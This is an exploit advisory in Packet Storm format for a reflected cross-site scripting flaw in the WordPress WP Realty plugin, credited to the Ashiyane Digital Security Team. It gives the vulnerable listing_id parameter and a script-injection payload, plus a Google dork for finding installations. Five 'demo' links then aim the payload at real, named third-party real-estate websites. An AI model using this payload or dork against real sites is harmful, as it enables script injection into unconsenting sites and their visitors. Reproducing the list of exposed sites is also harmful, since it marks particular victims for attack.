WordPress WP Realty Cross Site Scripting

2013-12-13T00:00:00
ID PACKETSTORM:124418
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-12-13T00:00:00

Description

                                        
                                            ` \ \ / / / ____| / ____|  
\ V / | (___ | (___  
> < \___ \ \___ \  
/ . \ ____) | ____) |  
/_/ \_\ |_____/ |_____/  
====================================================================  
# Exploit Title : Wordpress WP Realty plugin Cross site scripting  
  
# Exploit Author : Ashiyane Digital Security Team  
  
# Vendor Homepage : http://wprealty.org  
  
# Google Dork : inurl:wp-content/plugins/WP Realty  
  
# Date: 2013-12-09  
  
# Tested on: Windows 7 & Linux  
  
# discovered by : ACC3SS  
------------------------------------------------  
#  
# Exploit : Cross site scripting  
#  
# Location :  
localhost/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[xss]  
#  
# Method : Get  
#  
# Script For Test : "/><script>alert(1);</script>  
#  
------------------------------------------------  
#  
# Demo:  
#  
#  
http://realty.drillionnet.com//wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=  
"/><script>alert(1);</script>  
#  
#  
http://seabreezerentalsandsales.com/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=  
"/><script>alert(1);</script>  
#  
#  
http://juliann.beachrealtygroup.com/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=  
"/><script>alert(1);</script>  
#  
#  
http://www.summitcohomesandcondos.com/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=  
"/><script>alert(1);</script>  
#  
#  
http://www.sunandgolfhomes.com/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=  
"/><script>alert(1);</script>  
#  
######################  
`